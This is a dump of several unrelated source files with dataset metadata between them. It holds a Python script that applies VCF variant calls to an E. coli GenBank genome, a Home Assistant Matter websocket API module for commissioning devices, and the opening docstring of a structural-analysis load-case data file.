                    * position - Position in the starting genome (1-indexed).
                    * ref - Reference sequence at that position.
                    * alt - The alternative to replace with, wrapped in a pair
                        of delimiter characters (e.g. square brackets) that
                        are stripped below.
                Optional:
                    * note - A note to add to the data.
        """
        with open(variant_data_csv) as csv_fh:
            csv_reader = csv.DictReader(csv_fh)
            for row in csv_reader:
                pythonic_start = int(row['position']) - 1
                ref = row['ref']
                # NOTE: Hacky way of parsing that works for the way that
                # our particular data looks: drop the first and last char
                # (the surrounding brackets) of the alt value.
                alt = row['alt'][1:-1]
                if 'note' in row:
                    note = row['note']
                else:
                    note = None
                # Make the update for this record.
                self._update_genome_record_for_variant(
                        pythonic_start, ref, alt, note=note)
    def handle_vcf_record(self, record, sample_index, metadata=None):
        """Decides what to do with a single VCF call.

        Args:
            record: A pyvcf record object.
            sample_index: Index of the sample of interest within the record.
            metadata: Optional dict of extra qualifiers for any annotation.

        Returns:
            True if the genome was actually changed.
        """
        # The specific sample for this record.
        # NOTE: The vcf may have been generated across many samples at the
        # same time but this script only operates on a single sample.
        sample = record.samples[sample_index]

        # If not called, then nothing to do.
        if not sample.called:
            return False

        # Get the reference and alternate for this call.
        # NOTE: We reduce generality from what pyvcf since we are dealing
        # with a single sample.
        phase_char = sample.gt_phase_char()
        alts = sample.gt_bases.split(phase_char)

        # TODO: Figure out proper way to handle homozygous vs heterozygous.
        # assert len(set(alts)) == 1, (
        #         "Error while processing %s.\n"
        #         "We presently only support homozygous calls" %
        #         (str(record)))

        # HACK: For now, if we see a record that we should handle, we
        # assume that we should take the first alt that is different than
        # the ref.
        ref = record.REF
        for alt_candidate in alts:
            alt = alt_candidate
            if alt == ref:
                continue
            pythonic_position = record.POS - 1
            try:
                return self._update_genome_record_for_variant(
                        pythonic_position, ref, alt, metadata=metadata)
            except AssertionError as e:
                # Re-raise with the offending record for easier debugging.
                raise AssertionError(
                        "AssertionError while fixing record %s\n%s" % (
                                str(record), str(e)))
    def _update_genome_record_for_variant(self, pythonic_position, ref, alt,
            note=None, metadata=None):
        """Updates self.genome_record with the passed in data.

        Classifies the (ref, alt) pair as a SNP, deletion, insertion, or a
        generic replacement, and dispatches to the matching handler.
        Logic extracted into own method for testing.

        Args:
            pythonic_position: 0-indexed position in the source genome.
            ref: Reference sequence at that position.
            alt: Replacement sequence.
            note: Optional note qualifier for the annotation.
            metadata: Optional dict of extra qualifiers for the annotation.

        Returns:
            True if the genome was changed, False if there was nothing to do.
        """
        ref = ref.upper()
        alt = alt.upper()
        if ref == alt:
            # Nothing to do.
            return False

        # First, check whether the genome already looks like what it would
        # after the variant is fixed. We do this by fake-removing the ref
        # and adding the alt.
        # NOTE: One specific case that causes this issue is when we are
        # manually making the TAG changes before applying the rest of the
        # variants called in the VCF. This may bite us down the road, but this
        # whole script should probably be re-written in the near future.
        first_base_position = (
                self.runtime_liftover.convert_source_position_to_target(
                        pythonic_position, or_next=True))
        fake_seq = str(
                self.genome_record.seq[:first_base_position] +
                alt +
                self.genome_record.seq[first_base_position + len(ref):])
        if (fake_seq == str(self.genome_record.seq)):
            # Nothing to do.
            return False

        # The reason we don't just switch out the sequence above is that
        # we need to get the annotations right.
        # NOTE: Or is the above actually a more elegant way to do what follows?

        # Now determine the kind of mutation.
        if _is_snp(ref, alt):
            return self.handle_snp({
                'position': pythonic_position,
                'ref': ref,
                'alt': alt
            }, metadata=metadata)
        elif _is_deletion(ref, alt):
            deleted_subseq = _get_deletion(ref, alt)
            # The deleted bases are the tail of ref; rindex locates them.
            deleted_subseq_index_start = ref.rindex(deleted_subseq)
            assert len(deleted_subseq) == len(ref) - deleted_subseq_index_start
            deleted_subseq_start = (pythonic_position +
                    deleted_subseq_index_start)
            return self.handle_deletion({
                'interval': (deleted_subseq_start,
                        deleted_subseq_start + len(deleted_subseq)),
                'validation_seq': deleted_subseq
            }, note=note, metadata=metadata)
        elif _is_insertion(ref, alt):
            insertion_seq = _get_insertion(ref, alt)
            # The inserted bases are the tail of alt; rindex locates them.
            alt_insertion_start_index = alt.rindex(insertion_seq)
            # NOTE(review): the trailing 'position: d' in this message looks
            # like a typo for '%d'; with 3 args and 2 placeholders, building
            # the message would itself raise TypeError if the assert fires.
            assert len(insertion_seq) == len(alt) - alt_insertion_start_index, (
                    "Error handling insertion: ref: %s, alt: %s, position: d" %
                    (ref, alt, pythonic_position))
            insertion_start = pythonic_position + alt_insertion_start_index
            return self.handle_insertion({
                'position': insertion_start,
                'sequence': insertion_seq
            }, note=note, metadata=metadata)
        else:
            # Since we can't exactly tell, just delete ref and insert alt.
            validation_seq = str(self.original_genome_record.seq[
                    pythonic_position:pythonic_position + len(ref)])
            self.handle_deletion({
                'interval': (pythonic_position,
                        pythonic_position + len(ref)),
                'validation_seq': validation_seq
            }, add_annotation=False)
            self.handle_insertion({
                'position': pythonic_position,
                'sequence': alt
            }, add_annotation=False)

            #### Calculate data for the annotation.

            # The source interval is the interval that was removed
            # from the source.
            source_interval = (pythonic_position, pythonic_position + len(ref))

            # The insertion is not mapped in the liftover after the insertion,
            # so grab the starting position.
            target_genome_start = (
                    self.runtime_liftover.convert_source_position_to_target(
                            pythonic_position - 1, or_next=True) + 1)

            feature_id = 'misc_variant_source_%d-%d' % source_interval
            feature_location = FeatureLocation(
                    target_genome_start,
                    target_genome_start + len(alt))
            feature = SeqFeature(
                    type=VARIANT_ANNOTATION_TYPE,
                    location=feature_location,
                    strand=1,
                    id=feature_id
            )
            # Only store the full ref verbatim when it is short enough.
            if len(ref) <= MAX_REPLACE_CHARS:
                feature.qualifiers['replace'] = ref.lower()
            else:
                feature.qualifiers['replace'] = '%d base replacement' % len(ref)
            if note:
                feature.qualifiers['note'] = note
            if metadata:
                for key, value in metadata.iteritems():
                    if value:
                        feature.qualifiers[key] = value
            add_feature_to_seq_record(self.genome_record, feature)
            return True
def handle_snp(self, variant_data, add_annotation=True, note=None,
metadata=None):
"""Handle a single nucleotide position change.
"""
source_snp_position = variant_data['position']
ref_base = variant_data['ref']
alt_base = variant_data['alt']
snp_size = 1
# First, translate the position to the frame of the updated genome.
snp_position = (
self.runtime_liftover.convert_source_position_to_target(
source_snp_position))
if not snp_position:
# Nothing to do. This exact position has probably been deleted.
return False
# Make sure the ref is what is expected. This is a non-thorough
# but reasonable and bug check.
assert ref_base == self.genome_record.seq[snp_position], (
"Error fixing SNP at "
"source position %d, "
"target position %d, "
"Expected: %s, observed: %s" % (
source_snp_position, snp_position, ref_base,
self.genome_record.seq[snp_position]))
new_seq = (
self.genome_record.seq[:snp_position] +
alt_base +
self.genome_record.seq[snp_position + 1:])
self.genome_record.seq = new_seq
if add_annotation:
# Add feature marking SNP.
snp_feature_location = FeatureLocation(
snp_position, snp_position + snp_size)
snp_feature_id = 'snp_source_%d_%s_to_%s' % (
source_snp_position, ref_base, alt_base)
snp_feature = SeqFeature(
type=VARIANT_ANNOTATION_TYPE,
location=snp_feature_location,
strand=1,
id=snp_feature_id
)
snp_feature.qualifiers['replace'] = ref_base.lower()
if note:
snp_feature.qualifiers['note'] = note
if metadata:
for key, value in metadata.iteritems():
if value:
snp_feature.qualifiers[key] = value
add_feature_to_seq_record(self.genome_record, snp_feature)
# Change as made.
return True
def handle_insertion(self, variant_data, add_annotation=True, note=None,
        metadata=None):
    """Handles an insertion at the position relative to the original
    genome.

    Args:
        variant_data: Dictionary with keys:
            * position: Pythonic position for the insertion relative
                to the original genome record.
            * sequence: The sequence being inserted. One or more bases.
        add_annotation: If True, add a SeqFeature marking the insertion.
        note: Optional text stored in the feature's 'note' qualifier.
        metadata: Optional dict of extra qualifiers; falsy values skipped.

    Returns:
        True (the insertion is always applied).
    """
    source_position = variant_data['position']
    seq = variant_data['sequence']
    # First, translate the position to the frame of the updated genome.
    # or_next=True falls forward to the next mapped position if the exact
    # source position no longer exists.
    target_genome_position = (
        self.runtime_liftover.convert_source_position_to_target(
            source_position, or_next=True))
    # Insert the sequence at the provided position.
    insert_sequence_and_update_features(self.genome_record, seq,
        target_genome_position, extend_feature_ends=True)
    # Update the liftover interval mapping.
    self.runtime_liftover.handle_insertion(variant_data)
    if add_annotation:
        # Add a feature annotating the insertion.
        feature_id = 'insertion_source_%s' % (source_position,)
        feature_location = FeatureLocation(target_genome_position,
            target_genome_position + len(seq))
        feature = SeqFeature(
            type=VARIANT_ANNOTATION_TYPE,
            location=feature_location,
            strand=1,
            id=feature_id
        )
        # TODO: This doesn't work with the .tbl format.
        # Figure out how to fix this.
        # feature.qualifiers['replace'] = ''
        if note:
            feature.qualifiers['note'] = note
        if metadata:
            for key, value in metadata.iteritems():
                if value:
                    feature.qualifiers[key] = value
        add_feature_to_seq_record(self.genome_record, feature)
    # Change as made.
    return True
def handle_deletion(self, variant_data, add_annotation=True, note=None,
        metadata=None):
    """Handles a deletion.

    After this operation, the genome_record reflects the deletion.

    Args:
        variant_data: Dictionary with keys:
            * interval: A two-tuple representing pythonic interval for the
                deletion, i.e. (inclusive_start, exclusive_end).
                e.g. (100, 102) is a deletion of the 2 bases at positions
                100 and 101.
            * validation_seq: If provided, used to validate that the
                interval being deleted is this sequence.
        add_annotation: If True, add a SeqFeature marking the deletion.
        note: Optional text stored in the feature's 'note' qualifier.
        metadata: Optional dict of extra qualifiers; falsy values skipped.

    Returns:
        True (the deletion is always applied).
    """
    interval = variant_data['interval']
    # Inclusive-bounds interval for the target.
    target_genome_interval = [
        self.runtime_liftover.convert_source_position_to_target(
            bound, or_next=True)
        for bound in (interval[0], interval[1] - 1)]
    # Sanity check: the lifted interval must still cover exactly the
    # number of bases being deleted.
    assert (bases_in_interval(target_genome_interval) ==
        interval[1] - interval[0])
    # Convert back to a pythonic (exclusive-end) interval.
    target_genome_interval_pythonic = (
        target_genome_interval[0],
        target_genome_interval[1] + 1)
    delete_interval(self.genome_record, target_genome_interval_pythonic,
        validation_seq=variant_data.get('validation_seq', None))
    # Update the liftover mapping.
    self.runtime_liftover.handle_deletion({
        'interval': interval
    })
    if add_annotation:
        # Add a feature annotating the deletion.
        # Calculate the target genome interval for the annotation.
        # Annotate from the position before the deletion to the position
        # after.
        target_genome_interval_after_deletion = [
            self.runtime_liftover.convert_source_position_to_target(
                bound, or_next=True)
            for bound in (interval[0] - 1, interval[1])]
        feature_id = 'deletion_source_%d-%d' % (
            interval[0], interval[1])
        feature_location = FeatureLocation(
            target_genome_interval_after_deletion[0],
            target_genome_interval_after_deletion[1])
        feature = SeqFeature(
            type=VARIANT_ANNOTATION_TYPE,
            location=feature_location,
            strand=1,
            id=feature_id
        )
        ref = variant_data.get('validation_seq', '')
        # Keep the 'replace' qualifier short for large deletions.
        if len(ref) <= MAX_REPLACE_CHARS:
            feature.qualifiers['replace'] = ref.lower()
        else:
            feature.qualifiers['replace'] = '%d base deletion' % len(ref)
        feature.qualifiers['source_deletion_interval'] = str(interval)
        if note:
            feature.qualifiers['note'] = note
        if metadata:
            for key, value in metadata.iteritems():
                if value:
                    feature.qualifiers[key] = value
        add_feature_to_seq_record(self.genome_record, feature)
    # Change as made.
    return True
###############################################################################
# Main procedure entrypoint
###############################################################################
def run(original_genbank_path, output_root, vcf_path, sample_id,
        **kwargs):
    """Creates a modified genbank file starting from the original genbank
    and applying the changes indicated in the vcf file.

    Args:
        original_genbank_path: Path to the original genbank file, or an
            already-loaded SeqRecord (see isinstance check below).
        output_root: Root of filename, without extension. The extension
            will be appended to the name depending on the output type.
        vcf_path: Path to the vcf file.
        sample_id: Id of the target in the vcf, e.g. recoli_misq_c31_321D.
        kwargs: Optional keyword args. Supported keys:
            * liftover_pickle_dest: The output file to write the pickled
                liftover interval mapping to.
            * output_format: One of 'fasta' or 'genbank'. Defaults to
                'genbank'.
            * variant_data_csv: If included, will use
                update_from_variant_data_csv() rather than standard run.
            * verbose: Toggle for amount of informative print statements
                during processing.
            * manual_updates_filepath: Optional file of manual fixes
                passed through to VCFToGenbankMaker.
            * log_file: Optional log file passed to the standard run.

    Returns:
        The final SeqRecord that was also written to output.
    """
    # Strategy:
    # Iterate through the calls in the VCF file and incrementally
    # update the genome record. There are tricky subtleties including:
    #     * The frame of the target genome is constantly changing.
    # Nuances: When adding insertions/deletions, this may shift the overall
    # frame of the genome downstream from that particular position. We need a
    # liftover-like intermediate representation that allows us
    # to keep track of these accumulated shifts. For example, every successive
    # change that we want to make should have its position updated using
    # this method. That way, the annotation can potentially preserve the
    # position of the SNP relative to the original record, but we can
    # introduce the changes into the underlying sequence and update all
    # features appropriately.
    if isinstance(original_genbank_path, SeqRecord):
        genome_record = original_genbank_path
    else:
        # Read in the original genome.
        genome_record = SeqIO.read(original_genbank_path, 'genbank')
    # Get optional manual updates file.
    if 'manual_updates_filepath' in kwargs:
        manual_updates_filepath = kwargs['manual_updates_filepath']
    else:
        manual_updates_filepath = None
    # Create the object that encapsulates most of the calculation.
    vcf_to_genbank_maker = VCFToGenbankMaker(genome_record, vcf_path,
            sample_id, manual_updates_filepath)
    if 'variant_data_csv' in kwargs:
        vcf_to_genbank_maker.update_from_variant_data_csv(
            kwargs['variant_data_csv'])
    else:
        vcf_to_genbank_maker.run(
            verbose=kwargs.get('verbose', False),
            log_file=kwargs.get('log_file', None))
    # Write the final result.
    DEFAULT_OUTPUT_FORMAT = 'genbank'
    output_format = kwargs.get('output_format', DEFAULT_OUTPUT_FORMAT)
    output_path = output_root + '.' + output_format
    SeqIO.write(genome_record, output_path, output_format)
    # Optional: Pickle the liftover interval mappings.
    if 'liftover_pickle_dest' in kwargs:
        vcf_to_genbank_maker.runtime_liftover.pickle_interval_mapping(
            kwargs['liftover_pickle_dest'])
    return genome_record
###############################################################################
# Helpers to evaluate SNP type.
###############################################################################
def _is_snp(ref, alt):
return len(ref) == 1 and alt in ['A', 'T', 'G', 'C']
def _is_deletion(ref, alt):
return _get_deletion(ref, alt) is not None
def _get_deletion(ref, alt):
"""Extracts the portion of ref that is deleted relative to alt.
Returns None if no valid deletion found.
"""
if len(ref) <= len(alt):
return None
if len(alt) == 0:
return ref
# Make sure they are both uppercase for matching procedure below.
ref = ref.upper()
alt = alt.upper()
# Step through the two simultaneously until the first mismatch.
idx = 0
while idx < len(alt):
if ref[idx] != alt[idx]:
break
idx += 1
if idx < len(alt):
# Our definition of deletion requirex the entire alt to be matched.
return None
deletion = ref[idx:]
if not deletion:
return None
return deletion
def _is_insertion(ref, alt):
return _get_insertion(ref, alt) is not None
def _get_insertion(ref, alt):
"""Extracts the portion of alt that inserted relative to alt.
"""
# Just call _get_deletion with params reversed.
return _get_deletion(alt, ref)
###############################################################################
# Other utility methods
###############################################################################
def create_filtered_vcf(vcf_path, out_vcf_path, csv_with_pos_to_keep):
    """Filters the passed in vcf down to the variant calls that we actually
    want to add to the updated genbank file.

    Writes the results to out_vcf_path.

    The reason for this method that cleans up the vcf, rather than just
    using the csv directly is that the logic for going from vcf to genbank
    will hopefully be re-usable, so we might as take a first stab at it here.

    Args:
        vcf_path: Input vcf to filter.
        out_vcf_path: Destination path for the filtered vcf.
        csv_with_pos_to_keep: csv file with a 'POS' column listing the
            variant positions to retain.
    """
    # Positions uniquely identify SNPs (manually confirmed). The provided
    # csv file should only have SNPs that we are keeping.
    positions_to_keep = set([])
    with open(csv_with_pos_to_keep) as csv_fh:
        csv_reader = csv.DictReader(csv_fh)
        for row in csv_reader:
            positions_to_keep.add(int(row['POS']))
    # Now create a filtered a vcf with only the above positions.
    # The writer copies the reader's header/metadata.
    with open(vcf_path) as vcf_fh, open(out_vcf_path, 'w') as out_vcf_fh:
        vcf_reader = vcf.Reader(vcf_fh)
        vcf_writer = vcf.Writer(out_vcf_fh, vcf_reader)
        for record in vcf_reader:
            if record.POS in positions_to_keep:
                vcf_writer.write_record(record)
def add_TAG_annotations(genome_record):
    """Temporary method for adding our UAG mutations manually.

    Mutates the passed in genome_record by adding features for the
    amber SNPs.

    Args:
        genome_record: SeqRecord whose seq is edited in place and to
            which one annotation feature per UAG location is added.

    Raises:
        AssertionError: If the base at a listed position is neither
            'G' nor 'C'.
    """
    TAG_ANNOTATION_TYPE = VARIANT_ANNOTATION_TYPE
    UAG_LOCATIONS_FILE = os.path.join(
        GENOMES_DIR, 'mg1655', 'mg1655_uag_locations.csv')
    # Import the list of UAG locations and make the positions 0-indexed
    # to be consistent with the BioPython convention.
    uag_location_list = []
    with open(UAG_LOCATIONS_FILE) as fh:
        fh.readline()  # Drop the first line
        for line in fh.readlines():
            uag_location_list.append(int(line.strip()) - 1)
    uag_location_list = sorted(uag_location_list)
    for current_uag_position in uag_location_list:
        current_base = genome_record.seq[current_uag_position]
        # The listed position holds the mutated base; the strand is
        # inferred from whether we see 'G' (forward) or 'C' (reverse).
        # NOTE(review): feature spans presumably cover the 3-base codon —
        # confirm against the UAG locations file convention.
        if current_base == 'G':
            alt_base = 'A'
            feature_location = FeatureLocation(
                current_uag_position - 2,
                current_uag_position + 1)
            feature_strand = 1
        elif current_base == 'C':
            alt_base = 'T'
            feature_location = FeatureLocation(
                current_uag_position,
                current_uag_position + 3)
            feature_strand = -1
        else:
            raise AssertionError("Invalid base at position %d: %s" % (
                current_uag_position, current_base))
        # Update the sequence.
        new_seq = (
            genome_record.seq[:current_uag_position] +
            alt_base +
            genome_record.seq[current_uag_position + 1:])
        genome_record.seq = new_seq
        # Add a feature annotation.
        feature_id = 'remove_uag_%d' % current_uag_position
        feature = SeqFeature(
            type=TAG_ANNOTATION_TYPE,
            location=feature_location,
            strand=feature_strand,
            id=feature_id
        )
        feature.qualifiers['replace'] = 'tag'
        feature.qualifiers['note'] = 'Reassigning UAG'
        add_feature_to_seq_record(genome_record, feature)
def get_vcf_metadata():
    """Returns a dictionary with keys being SNP positions and values
    being the data from DBG's analysis with SnpEFF etc.
    """
    metadata_csv = os.path.join(REC1_C321D_ROOT, 'rec1_c321d_snps.csv')
    effect_fields = ('EFF_AA', 'EFF_CODON', 'EFF_FUNC', 'EFF_SEV')
    with open(metadata_csv) as csv_fh:
        return {
            int(row['POS']): {field: row[field] for field in effect_fields}
            for row in csv.DictReader(csv_fh)
        }
###############################################################################
# Testing and scripting
###############################################################################
if __name__ == '__main__':
    # Input/output locations for the rec1_c321d genome build.
    MG1655_GENBANK = os.path.join(GENOMES_DIR, 'mg1655', 'mg1655.genbank')
    RECOLI_ALL_SNPS = os.path.join(REC1_C321D_ROOT, 'recoli_all_snps.vcf')
    C321D_SNPS_VCF = os.path.join(REC1_C321D_ROOT, 'rec1_c321d_snps.vcf')
    REC1_C321D_SAMPLE_ID = 'recoli_misq_c31_321D'
    REC1_C321D_OUTPUT_ROOT = os.path.join(REC1_C321D_ROOT, 'rec1_c321d')
    REC1_C321D_PRELIM_OUTPUT_ROOT = os.path.join(REC1_C321D_ROOT,
            'rec1_c321d.preliminary')
    PICKLE_DEST = os.path.join(REC1_C321D_ROOT, 'rec1_c321d_liftover.pickle')
    MANUAL_UPDATES = os.path.join(REC1_C321D_ROOT, 'rec1_c321d_manual_fixes.txt')

    # # First filter the edits that we actually want to keep.
    # # TODO: Make the run() method take as an optional argument a user-specified
    # # argument for filtering which vcf rows are incorporated into the Genbank.
    # CSV_WITH_POS_TO_KEEP = os.path.join(REC1_C321D_ROOT, 'rec1_c321d_snps.csv')
    # create_filtered_vcf(RECOLI_ALL_SNPS, C321D_SNPS_VCF, CSV_WITH_POS_TO_KEEP)

    # Now run the genbank creator.
    kwargs = {
        'liftover_pickle_dest': PICKLE_DEST,
        'manual_updates_filepath': MANUAL_UPDATES,
        'output_format': 'genbank',
        'verbose': True
    }
    run(MG1655_GENBANK, REC1_C321D_OUTPUT_ROOT, C321D_SNPS_VCF,
            REC1_C321D_SAMPLE_ID, **kwargs)

    ### Developing manual updates
    # REC1_C321D_MANUAL_ONLY_OUT = os.path.join(REC1_C321D_ROOT,
    #         'rec1_c321d_manual_only.genbank')
    # genome_record = SeqIO.read(MG1655_GENBANK, 'genbank')
    # vcf_to_genbank_maker = VCFToGenbankMaker(genome_record, None,
    #         None, MANUAL_UPDATES)
    # vcf_to_genbank_maker.handle_manual_updates()
    # SeqIO.write(genome_record, REC1_C321D_MANUAL_ONLY_OUT, 'genbank')

    ### Developing chain file output.
    # runtime_liftover = RuntimeLiftover(genome_record)
    # runtime_liftover.pickle_interval_mapping(PICKLE_DEST)
    # print runtime_liftover._interval_mapping
    # CHAIN_FILE_DEST = os.path.join(GENOMES_DIR, 'mg1655.to.rec1_c321d.chain')
    # runtime_2 = RuntimeLiftover.from_pickled_intervals(
    #         [], PICKLE_DEST)
    # runtime_2.write_chain_file(CHAIN_FILE_DEST)

    ### Generating source genome positions for c321D Genbank SNPs
    # OUT_CSV_FIELD_NAMES = ['position', 'ref', 'alt', 'mg1655_position']
    # REALIGNED_SNPS_IN = os.path.join(REC1_C321D_ROOT, 'realignment_snps.csv')
    # REALIGNED_SNPS_WITH_MG1655_POS = os.path.join(
    #         REC1_C321D_ROOT, 'realignment_snps_with_mg1655_positions.csv')
    # MG1655_GENOME_RECORD = SeqIO.read(MG1655_GENBANK, 'genbank')
    # runtime_liftover_obj = RuntimeLiftover.from_pickled_intervals(
    #         MG1655_GENOME_RECORD, PICKLE_DEST)
    # with open(REALIGNED_SNPS_WITH_MG1655_POS, 'w') as out_csv_fh:
    #     csv_writer = csv.DictWriter(out_csv_fh, OUT_CSV_FIELD_NAMES)
    #     csv_writer.writeheader()
    #     with open(REALIGNED_SNPS_IN) as in_csv_fh:
    #         csv_reader = csv.DictReader(in_csv_fh)
    #         for row in csv_reader:
    #             out_row = copy.copy(row)
    #             # Convert the position. Note the indexing correction.
    #             c321d_position_pythonic = int(row['position']) - 1
    #             mg1655_position_pythonic = (
    #                     runtime_liftover_obj.convert_target_position_to_source(
    #                             c321d_position_pythonic))
    #             if mg1655_position_pythonic is not None:
    #                 # Validation check that the base at that position is
    #                 # correct.
    #                 assert row['ref'][0] == (
    #                         runtime_liftover_obj.source_genome_record.seq[
    #                                 mg1655_position_pythonic])
    #                 # Make the position one-indexed to be consistent
    #                 # with the vcf standard.
    #                 mg1655_position = mg1655_position_pythonic + 1
    #             else:
    #                 mg1655_position = None
    #             out_row['mg1655_position'] = mg1655_position
    #             csv_writer.writerow(out_row)
| [
"[email protected]"
] | |
4261205d147bd377b81a8fb578bf7586b1f999d2 | 296132d2c5d95440b3ce5f4401078a6d0f736f5a | /homeassistant/components/matter/api.py | 36cf83fd0dab7563414b7bed72aa10b48494fe9e | [
"Apache-2.0"
] | permissive | mezz64/home-assistant | 5349a242fbfa182159e784deec580d2800173a3b | 997d4fbe5308b01d14ceabcfe089c2bc511473dd | refs/heads/dev | 2023-03-16T22:31:52.499528 | 2022-12-08T02:55:25 | 2022-12-08T02:55:25 | 68,411,158 | 2 | 1 | Apache-2.0 | 2023-03-10T06:56:54 | 2016-09-16T20:04:27 | Python | UTF-8 | Python | false | false | 4,458 | py | """Handle websocket api for Matter."""
from __future__ import annotations
from collections.abc import Callable
from functools import wraps
from typing import Any
from matter_server.client.exceptions import FailedCommand
import voluptuous as vol
from homeassistant.components import websocket_api
from homeassistant.components.websocket_api import ActiveConnection
from homeassistant.core import HomeAssistant, callback
from .adapter import MatterAdapter
from .const import DOMAIN
ID = "id"
TYPE = "type"
@callback
def async_register_api(hass: HomeAssistant) -> None:
    """Register all of our api endpoints."""
    handlers = (
        websocket_commission,
        websocket_commission_on_network,
        websocket_set_thread_dataset,
        websocket_set_wifi_credentials,
    )
    for handler in handlers:
        websocket_api.async_register_command(hass, handler)
def async_get_matter_adapter(func: Callable) -> Callable:
    """Decorate function to get the MatterAdapter."""

    @wraps(func)
    async def _with_adapter(
        hass: HomeAssistant, connection: ActiveConnection, msg: dict
    ) -> None:
        """Look up the MatterAdapter and pass it through to the handler."""
        # There is one adapter per config entry; grab the first one.
        adapters = hass.data[DOMAIN].values()
        matter: MatterAdapter = next(iter(adapters))
        await func(hass, connection, msg, matter)

    return _with_adapter
def async_handle_failed_command(func: Callable) -> Callable:
    """Decorate function to handle FailedCommand and send relevant error."""

    @wraps(func)
    async def _wrapped(
        hass: HomeAssistant,
        connection: ActiveConnection,
        msg: dict[str, Any],
        *args: Any,
        **kwargs: Any,
    ) -> None:
        """Run the handler, translating FailedCommand into a WS error."""
        try:
            await func(hass, connection, msg, *args, **kwargs)
        except FailedCommand as err:
            # Forward the matter-server error code and message to the caller.
            connection.send_error(msg[ID], err.error_code, err.args[0])

    return _wrapped
@websocket_api.require_admin
@websocket_api.websocket_command(
    {
        vol.Required(TYPE): "matter/commission",
        vol.Required("code"): str,
    }
)
@websocket_api.async_response
@async_handle_failed_command
@async_get_matter_adapter
async def websocket_commission(
    hass: HomeAssistant,
    connection: ActiveConnection,
    msg: dict[str, Any],
    matter: MatterAdapter,
) -> None:
    """Add a device to the network and commission the device.

    msg["code"] is the Matter pairing code; failures are converted into
    websocket errors by the async_handle_failed_command decorator.
    """
    await matter.matter_client.commission_with_code(msg["code"])
    connection.send_result(msg[ID])
@websocket_api.require_admin
@websocket_api.websocket_command(
    {
        vol.Required(TYPE): "matter/commission_on_network",
        vol.Required("pin"): int,
    }
)
@websocket_api.async_response
@async_handle_failed_command
@async_get_matter_adapter
async def websocket_commission_on_network(
    hass: HomeAssistant,
    connection: ActiveConnection,
    msg: dict[str, Any],
    matter: MatterAdapter,
) -> None:
    """Commission a device already on the network.

    msg["pin"] is the device's setup PIN; failures are converted into
    websocket errors by the async_handle_failed_command decorator.
    """
    await matter.matter_client.commission_on_network(msg["pin"])
    connection.send_result(msg[ID])
@websocket_api.require_admin
@websocket_api.websocket_command(
    {
        vol.Required(TYPE): "matter/set_thread",
        vol.Required("thread_operation_dataset"): str,
    }
)
@websocket_api.async_response
@async_handle_failed_command
@async_get_matter_adapter
async def websocket_set_thread_dataset(
    hass: HomeAssistant,
    connection: ActiveConnection,
    msg: dict[str, Any],
    matter: MatterAdapter,
) -> None:
    """Set thread dataset.

    Passes the hex-encoded Thread operational dataset string straight
    through to the matter server.
    """
    await matter.matter_client.set_thread_operational_dataset(
        msg["thread_operation_dataset"]
    )
    connection.send_result(msg[ID])
@websocket_api.require_admin
@websocket_api.websocket_command(
    {
        vol.Required(TYPE): "matter/set_wifi_credentials",
        vol.Required("network_name"): str,
        vol.Required("password"): str,
    }
)
@websocket_api.async_response
@async_handle_failed_command
@async_get_matter_adapter
async def websocket_set_wifi_credentials(
    hass: HomeAssistant,
    connection: ActiveConnection,
    msg: dict[str, Any],
    matter: MatterAdapter,
) -> None:
    """Set WiFi credentials for a device.

    network_name is the SSID; the credentials are forwarded to the
    matter server which provisions the device.
    """
    await matter.matter_client.set_wifi_credentials(
        ssid=msg["network_name"], credentials=msg["password"]
    )
    connection.send_result(msg[ID])
| [
"[email protected]"
] | |
bd91cb8c7e9e1344cfd7f3d1410c23d658e9438d | ba054fa1ec409011444e9c6b963309745e150d6f | /ps_bole_calculs_statiques/xc_model_impact/loadStateData.py | 69e20459fe07531c2303bcc316ffa946b24e867d | [] | no_license | berndhahnebach/XCmodels | a6500fdde253dea10ef2bb64b7ebc3dbfc2577c2 | 4acdd7747abd7cd71f5ef580f65e93359560e5a9 | refs/heads/master | 2020-04-02T23:36:36.385054 | 2018-10-20T16:49:21 | 2018-10-20T16:49:21 | 154,873,006 | 0 | 0 | null | 2018-10-26T17:52:36 | 2018-10-26T17:52:35 | null | UTF-8 | Python | false | false | 5,140 | py | # -*- coding: utf-8 -*-
'''In this script we define default data of load cases to be used (or changed)
while displaying loads or results associated to single load cases
'''
from postprocess.reports import graphical_reports
'''
Definition of record objects with these attributes:
loadCaseName: name of the load case to be depicted
loadCaseDescr: description text of the load case
loadCaseExpr: mathematical expression to define the load case (ex:
'1.0*GselfWeight+1.0*DeadLoad')
setsToDispLoads: ordered list of sets of elements to display loads
setsToDispBeamLoads: ordered list of sets of beam elements to display loads
(defaults to [])
compElLoad: component of load on beam elements to be represented
available components: 'axialComponent', 'transComponent',
'transYComponent','transZComponent'
unitsScaleLoads: factor to apply to loads if we want to change
the units (defaults to 1).
unitsLoads: text to especify the units in which loads are
represented (defaults to 'units:[m,kN]')
vectorScaleLoads: factor to apply to the vectors length in the
representation of loads (defaults to 1 -> auto-scale).
vectorScalePointLoads: factor to apply to the vectors length in the
representation of nodal loads (defaults to 1).
multByElemAreaLoads: boolean value that must be True if we want to
represent the total load on each element
(=load multiplied by element area) and False if we
are going to depict the value of the uniform load
per unit area (defaults to False)
listDspRot: ordered list of displacement or rotations to be displayed
available components: 'uX', 'uY', 'uZ', 'rotX', rotY', 'rotZ'
(defaults to ['uX', 'uY', 'uZ'])
setsToDispDspRot: ordered list of sets of elements to display displacements
or rotations
unitsScaleDispl: factor to apply to displacements if we want to change
the units (defaults to 1).
unitsDispl: text to especify the units in which displacements are
represented (defaults to '[m]'
listIntForc: ordered list of internal forces to be displayed as scalar field
over «shell» elements
available components: 'N1', 'N2', 'M1', 'M2', 'Q1', 'Q2'
(defaults to ['N1', 'N2', 'M1', 'M2', 'Q1', 'Q2'])
setsToDispIntForc: ordered list of sets of elements (of type «shell»)to
display internal forces
listBeamIntForc: ordered list of internal forces to be displayed
as diagrams on lines for «beam» elements
available components: 'N', 'My', 'Mz', 'Qy', 'Qz','T'
(defaults to ['N', 'My', 'Mz', 'Qy', 'Qz','T'])
setsToDispBeamIntForc: ordered list of sets of elements (of type «beam»)to
display internal forces (defaults to [])
scaleDispBeamIntForc: tuple (escN,escQ,escM) correponding to the scales to
apply to displays of, respectively, N Q and M beam internal
forces (defaults to (1.0,1.0,1.0))
unitsScaleForc: factor to apply to internal forces if we want to change
the units (defaults to 1).
unitsForc: text to especify the units in which forces are
represented (defaults to '[kN/m]')
unitsScaleMom: factor to apply to internal moments if we want to change
the units (defaults to 1).
unitsMom: text to especify the units in which bending moments are
